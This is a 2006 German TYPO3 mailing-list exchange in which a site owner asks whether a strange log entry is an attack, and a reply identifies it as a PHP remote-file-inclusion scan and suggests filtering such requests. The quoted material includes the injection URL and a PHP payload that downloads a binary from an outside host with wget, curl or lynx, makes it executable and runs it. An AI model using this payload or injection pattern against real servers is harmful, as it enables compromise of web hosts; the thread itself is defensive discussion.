[TYPO3-german] Komische Anfrage an mein Typo3
Stefan Precht
sprecht at symplasson.de
Thu Aug 31 23:04:46 CEST 2006
Hi!
Verschiedene Scann-Verfahren die auch für Pen-Tests genutzt werden
laufen eben so ab. Es wird hier versucht über einen URL Aufruf PHP Code
bei Dir einzuschleusen...
Wird bei dem Parameter L wohl nicht sehr weit kommen, aber wenn Du in
Deinen Logs siehst, dass derartige Anfragen derzeit in verschiedenen
Kombinationen auftauchen, scannt irgendwer Dein System. Sperr die
Referref oder Filter alle Anfragen die ein republika im Aufruf haben...
Viele Grüße,
Stefan
Christian Leicht wrote:
> Hallo
>
> ich habe gerade meine Logfiles einer T3 installation durchgeschaut und
> folgenes gefunden:
>
> index.php?id=34&L=http://abuser.republika.pl/test
>
> Versucht da jemand meine Seite zu knacken? Wenn ich dem Link nachgehe
> kommt dieses php Script zum Vorschein:
>
> <?
>
> echo 'm4k4bra - mamy cie';
>
> system('cd /var/tmp;wget http://abuser.republika.pl/kt2; if [ ! -e ./kt2
> ]; then curl http://abuser.republika.pl/kt2 > kt2;fi;if [ ! -e ./kt2
> ];then lynx -dump http://abuser.republika.pl/kt2 >kt2; fi; chmod 777
> kt2; ./kt2&');
>
> ?>
>
> Christian
More information about the TYPO3-german
mailing list